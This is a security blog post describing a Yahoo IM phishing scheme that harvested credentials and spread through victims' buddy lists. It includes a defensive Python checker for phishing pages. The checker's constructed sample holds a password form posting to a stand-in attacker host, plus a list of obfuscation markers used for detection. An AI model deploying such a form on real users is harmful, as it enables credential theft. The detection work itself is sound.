Being in this business, we are often called upon to help clean up the computers of families and friends. In the past I have had many friends who thought they had a virus, but usually it was just some other system anomaly. Times have changed though, and now I tend to see a lot of adware and spyware as well as infections from worms and IRC bots. Usually it is just a matter of running a few tools, deleting a few registry keys and files and everything is better.
So, when a friend of mine recently sent me an odd instant message (IM) on Yahoo IM, I wasn’t that surprised. I immediately recognized it as suspicious, since my friend would have no reason to be using a free Brazilian homepage Web site, and I don’t think he had ever written a smiley face in the manner displayed on the IM. (See figure 1)
I downloaded the page on a safe network (not using a browser) and had a look at the HTML code. When the page is rendered in a browser, it appears to an unsuspecting user that you need to log in in order to view the Web site photos. (See figure 2)
This in itself isn’t very unusual, and furthermore the page is hosted on a yahoo.com.br domain, so it all appears safe. However, embedded and heavily obfuscated inside the page was code that caused the Yahoo IM login credentials to be sent to a hotmail.com email address after they were entered. (See figure 3)
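The kind of check a defender can run on a downloaded page like this, as an added example that is not part of the original post: it parses a saved HTML page, flags any password form whose action submits off-site or by mailto, and notes inline script that uses common obfuscation constructs. The URLs, host names and page contents below are constructed; the post only says the credentials were sent to a hotmail.com address, so the off-site form check is an assumption about one common way such a page exfiltrates what the user types, not a description of the actual page.

```python
# Added example (not from the original post): audit a saved HTML page for login forms
# that would send credentials somewhere other than the site hosting the page.
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructs often seen in obfuscated inline script; their presence is a hint, not proof.
OBFUSCATION_MARKERS = ("unescape(", "eval(", "String.fromCharCode(", "document.write(")


class LoginFormCollector(HTMLParser):
    """Collects every <form> that contains a password field, plus all inline script text."""

    def __init__(self):
        super().__init__()
        self.forms = []          # dicts: {"action": str, "has_password": bool}
        self.script_chunks = []  # raw text of every <script> block
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_chunks.append(data)


def same_site(form_host, page_host):
    """Treat the page's own host and its subdomains as same-site (a simplification)."""
    return form_host == page_host or form_host.endswith("." + page_host)


def audit_login_page(html, page_url):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    page_host = urlparse(page_url).hostname or ""
    collector = LoginFormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        action = form["action"].strip()
        if action.lower().startswith("mailto:"):
            findings.append("password form is submitted by e-mail to " + action[7:])
            continue
        action_host = urlparse(action).hostname
        # A relative action (no host part) stays on the page's own site.
        if action_host and not same_site(action_host, page_host):
            findings.append("password form posts off-site to " + action_host)
    script = "".join(collector.script_chunks)
    hits = [m for m in OBFUSCATION_MARKERS if m in script]
    if hits:
        findings.append("inline script uses obfuscation constructs: " + ", ".join(hits))
    return findings


# Constructed sample: a "log in to see the photos" page on a free-hosting domain whose
# form posts to an unrelated host and whose inline script is unescape()-obfuscated.
SAMPLE_URL = "http://pages.free-host.example/album.html"
SAMPLE_HTML = """
<html><body>
<p>Log in to view the photos</p>
<form action="http://relay.attacker.invalid/collect" method="post">
  <input name="login"><input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form>
<script>document.write(unescape("%3Cimg%20src%3D%22/logo.gif%22%3E"));</script>
</body></html>
"""

# Constructed benign page: relative action on the same host, no inline script.
BENIGN_HTML = """
<form action="/login" method="post">
  <input name="user"><input type="password" name="pw">
</form>
"""

if __name__ == "__main__":
    for finding in audit_login_page(SAMPLE_HTML, SAMPLE_URL):
        print("FLAG:", finding)
```

Run it against a page saved with a non-browser fetch, as the post describes, and pass the URL the page was served from so the same-site comparison has something to compare against. An empty result only means these particular tells are absent; a form whose action is rewritten by script at runtime, for instance, would need the script itself to be read.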
I figured that my friend’s computer must be infected and sent him a message to run a few tools and send me back the logs. I was pretty sure I’d find an infection, tell him to delete a few files, and remind him to use an antivirus product. It turned out he was already using an antivirus product, and after going through the logs from the tools I sent, I found nothing suspicious. I was a bit stumped. The threat could have been highly complex (polymorphic, hidden by a rootkit, or memory-only), but the chances of that were slim. These days there is so much low-hanging fruit in the form of unsuspecting computer users that your average script kiddie doesn’t go to complex lengths, even if the tools are available to them.
After questioning my friend some more to see if his antivirus product happened to detect anything afterwards, or if he had already deleted something, the picture became clearer to me. There was no file-based threat and there was nothing to find on his system. What was happening was that some hacker spammed out the phishing link to a group of harvested Yahoo IM users, who then clicked on the link. Thinking they were required to log in to see the Web photos, they entered their Yahoo ID and password. Once they logged in, their credentials were sent to the hotmail.com email address. The hacker then used the login credentials (likely in an automated fashion) to log on to Yahoo IM. This causes the victim to be kicked off the network, which is a feature of Yahoo IM (if you log in at a different location, your existing connection is bumped off).
Now logged into Yahoo IM as someone else, the hacker would have access to the victim’s buddy list, and then would send the same phishing link to everyone on that list so the recipients would think the message was coming from a friend. The recipients would then click on the link, provide their Yahoo credentials, be bumped off the network, and have all of their friends receive the link and so the cycle would continue. This allowed the hacker to collect Yahoo login IDs and passwords and at the same time replicate his phishing attempt—all without creating an actual file—so there really wasn’t anything for the antivirus program to detect and nothing for me to find.
I sent off the domains in question to the relevant authorities to have them shut down, but in that span of just a couple of days the hacker had definitely acquired quite a few Yahoo credentials, and we can now only guess at what he ultimately decided to do with them. Since Yahoo shares login credentials across all of their services, the hacker could easily read a person’s email, log in to their Yahoo Wallet account, view their portal page with their financial portfolio, impersonate them on IM, and likewise trade or sell all of this information.
These types of phishing attempts are getting more sophisticated every day and we need to be very wary of them. Telling a real page from a fake one can be difficult, especially when the fake is hosted on the proper domain.